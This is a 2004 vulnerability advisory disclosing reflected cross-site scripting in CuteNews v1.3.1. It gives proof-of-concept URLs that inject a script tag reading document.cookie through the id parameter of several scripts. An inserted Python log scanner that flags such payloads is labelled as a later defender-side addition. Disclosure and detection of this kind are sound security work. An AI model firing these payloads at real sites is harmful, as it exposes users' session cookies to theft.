Cross-Site Scripting CuteNews
http://www.swp-zone.org/archivos/advisory-06.txt
-------------------------------------------------------------------------------------------------
:.: Cross-Site Scripting CuteNews :.:
PROGRAM: CuteNews
HOMEPAGE: http://cutephp.com/
VERSION: v1.3.1
BUG: Cross-Site Scripting
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
CuteNews is a popular news publishing system, written in PHP by
CutePHP.
2.- Vulnerabilities:
---------------
A. Cross-Site Scripting aka XSS:
:.: In the id parameter :
http://attacker/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&
http://attacker/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&
http://attacker/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>
http://attacker/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script>
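As an added defender-side example, not part of this advisory or of CuteNews, the following Python scanner reads web-server access-log lines and flags requests to the two scripts above whose `id` parameter is not a plain numeric news id. The log lines are constructed, and the assumption that CuteNews ids are digit-only is mine.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Scripts and parameter named in the advisory; ids are assumed to be digit-only
# (CuteNews uses numeric news ids), so anything else in `id` is worth a look.
WATCHED_SCRIPTS = {"show_news.php", "show_archives.php"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (Apache common format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [23/May/2004:10:01:02 +0000] "GET /show_news.php?subaction=showfull&id=1085214000 HTTP/1.1" 200 4096
203.0.113.9 - - [23/May/2004:10:02:17 +0000] "GET /show_news.php?subaction=showcomments&id=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E&archive=&start_from=&ucat= HTTP/1.1" 200 3120
203.0.113.9 - - [23/May/2004:10:02:40 +0000] "GET /show_archives.php?subaction=showcomments&id=1085214000abc&archive= HTTP/1.1" 200 3100
203.0.113.7 - - [23/May/2004:10:03:05 +0000] "GET /index.php?id=%3Cb%3Ex HTTP/1.1" 200 512
"""

def suspicious_id(value: str) -> Optional[str]:
    """Classify an already URL-decoded id value; None means it looks like a normal id."""
    if value.isdigit():
        return None
    if "<" in value or ">" in value:
        return "markup in id"
    return "non-numeric id"

def scan_access_log(text: str) -> list:
    """Return one finding per suspicious `id` sent to a watched CuteNews script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        script = parts.path.rsplit("/", 1)[-1]
        if script not in WATCHED_SCRIPTS:
            continue  # e.g. index.php: not one of the endpoints in the advisory
        # parse_qs percent-decodes values; keep_blank_values keeps empty params visible
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            reason = suspicious_id(value)
            if reason:
                findings.append({"line": lineno, "script": script,
                                 "reason": reason, "id": value})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['script']} -> {f['reason']}: {f['id']!r}")
```

Running it on the sample prints the second and third lines as findings; the first (numeric id) and fourth (a script not in the watch list) are skipped.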
3.- SOLUTION:
--------
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the CuteNews website for updates and official release details.
4.- Greetings:
---------
Greetings to my Peruvian group SWP and perunderforce :D
"PISCO IS AND WILL BE PERUVIAN"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF ]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"
---------------------- The End ----------------------